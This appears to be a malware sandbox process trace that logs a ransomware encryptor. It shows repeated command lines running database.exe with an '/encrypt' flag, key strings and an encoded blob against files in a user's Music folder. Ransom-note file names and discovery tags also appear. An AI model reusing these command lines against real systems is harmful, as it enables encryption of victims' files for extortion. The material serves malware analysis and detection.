C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Music\LimitApprove.mhtml.sage.gif"5⤵PID:6800
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Music\LimitPing.otf.sage.gif"5⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:1116
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Music\MeasureLock.gif.sage.gif"5⤵PID:4284
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Music\MergeSkip.mov.sage.gif"5⤵PID:3060
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Music\NewWrite.tif.sage.gif"5⤵PID:4956
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Music\README_sTlLoTpq.hta.gif"5⤵PID:4312
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Music\ReceiveDebug.potm.sage.gif"5⤵PID:4456
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Music\RegisterSync.mpg.sage.gif"5⤵PID:3604
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Music\RemoveDismount.i64.gif"5⤵PID:6952
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Music\ResetDebug.iso.sage.gif"5⤵PID:5316
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Music\ResetSkip.mov.sage.gif"5⤵PID:3544
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Music\ResolveMerge.search-ms.sage.gif"5⤵PID:6668
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Music\Restore-My-Files.txt"5⤵PID:4044
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Music\ResumeUpdate.rle.id-DA208E5B.[[email protected]].gamma.gif"5⤵PID:1844
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Music\SendCompress.ppsm.sage.gif"5⤵PID:6544
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Music\StopMeasure.xlsb.sage.gif"5⤵PID:4304
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Music\SuspendLimit.temp.sage.gif"5⤵PID:5940
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Music\SuspendSelect.cab.sage.gif"5⤵PID:1116
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Music\SuspendUpdate.pub.id-DA208E5B.[[email protected]].gamma.gif"5⤵PID:2104
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Music\TracePing.potm.sage.gif"5⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:5404
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Music\TraceSwitch.eps.sage.gif"5⤵PID:1716
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Music\UnblockClose.odp.sage.gif"5⤵PID:7096
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Music\UnprotectWait.mhtml.sage.gif"5⤵PID:4320
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Music\UpdateExport.mpa.sage.gif"5⤵PID:4324
-
-
